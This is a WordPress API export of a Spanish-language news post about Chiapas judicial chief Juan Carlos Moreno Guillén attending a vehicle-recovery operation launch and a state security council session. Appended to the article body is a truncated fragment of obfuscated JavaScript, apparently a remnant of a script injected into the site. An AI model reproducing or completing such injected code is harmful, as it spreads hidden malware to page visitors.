{"id":19786,"date":"2025-01-14T03:57:06","date_gmt":"2025-01-14T03:57:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19786"},"modified":"2025-01-14T03:57:07","modified_gmt":"2025-01-14T03:57:07","slug":"en-chiapas-con-vocacion-y-compromiso-se-lograra-una-sociedad-mas-justa-y-segura-poder-judicial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19786","title":{"rendered":"En Chiapas, con vocaci\u00f3n y compromiso se lograr\u00e1 una sociedad m\u00e1s justa y segura: Poder Judicial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0032-1024x683.jpg\" alt=\"\" class=\"wp-image-19787\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0032-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0032-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0032-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250113-WA0032.jpg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>13 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; El magistrado presidente del Poder Judicial, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en el banderazo de salida del operativo Recuperaci\u00f3n de Veh\u00edculos en el Estado y en la instalaci\u00f3n de la XLIV Sesi\u00f3n Ordinaria del Consejo Estatal de Seguridad P\u00fablica (CESP), encabezados por el gobernador del Estado y presidente del CESP, Eduardo Ram\u00edrez Aguilar.<\/p>\n\n\n\n<p>En el primer evento, donde estuvieron presentes el secretario de Seguridad del Pueblo, \u00d3scar Alberto Aparicio Avenda\u00f1o y el fiscal general, Jorge Luis Llaven Abarca, Moreno Guill\u00e9n destac\u00f3 la importancia de la colaboraci\u00f3n interinstitucional para hacer frente a este delito, resaltando que &#8220;el trabajo coordinado entre las diferentes fuerzas y operadores de seguridad, es fundamental para garantizar la tranquilidad de las familias chiapanecas\u201d.<\/p>\n\n\n\n<p>Asimismo, en el marco de la instalaci\u00f3n de la XLIV Sesi\u00f3n Ordinaria del CESP, el tambi\u00e9n titular del Consejo de la Judicatura, Juan Carlos Moreno, reconoci\u00f3 las acciones de seguridad que se emprenden desde este consejo estatal, como encargados de coordinar, planear e implementar acciones que den seguimiento a los acuerdos, lineamientos y pol\u00edticas emitidas por el Consejo Nacional de Seguridad P\u00fablica, todo con la misi\u00f3n de construir un estado m\u00e1s seguro.<\/p>\n\n\n\n<p>\u201cEn Chiapas, la sinergia de las autoridades de los tres \u00f3rdenes de gobierno, as\u00ed como las instancias de administraci\u00f3n y procuraci\u00f3n de justicia, son primordiales en materia de seguridad. Por ello, las servidoras y los servidores del Poder Judicial estamos comprometidos a trabajar por una impartici\u00f3n de justicia humanista que refuercen estas acciones\u201d, enfatiz\u00f3.<\/p>\n\n\n\n<p>Finalmente, celebr\u00f3 el compromiso y la vocaci\u00f3n de cada integrante del CESP y de las y los elementos que participan en este Operativo de Recuperaci\u00f3n de Veh\u00edculos, como parte de la nueva era en Chiapas, con la que, sin duda, las chiapanecas y los chiapanecos no s\u00f3lo lograr\u00e1n recobrar la confianza en las instituciones, sino que tendr\u00e1n una sociedad m\u00e1s justa y segura.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 13 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; El magistrado presidente del Poder Judicial, Juan Carlos Moreno Guill\u00e9n, particip\u00f3 en el banderazo de salida del operativo Recuperaci\u00f3n de Veh\u00edculos en el Estado y en la instalaci\u00f3n de la XLIV Sesi\u00f3n Ordinaria del Consejo Estatal de Seguridad P\u00fablica (CESP), encabezados por el gobernador del Estado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19787,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19786","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19786","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19786"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19786\/revisions"}],"predecessor-version":[{"id":19788,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19786\/revisions\/19788"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19787"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19786"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19786"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19786"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}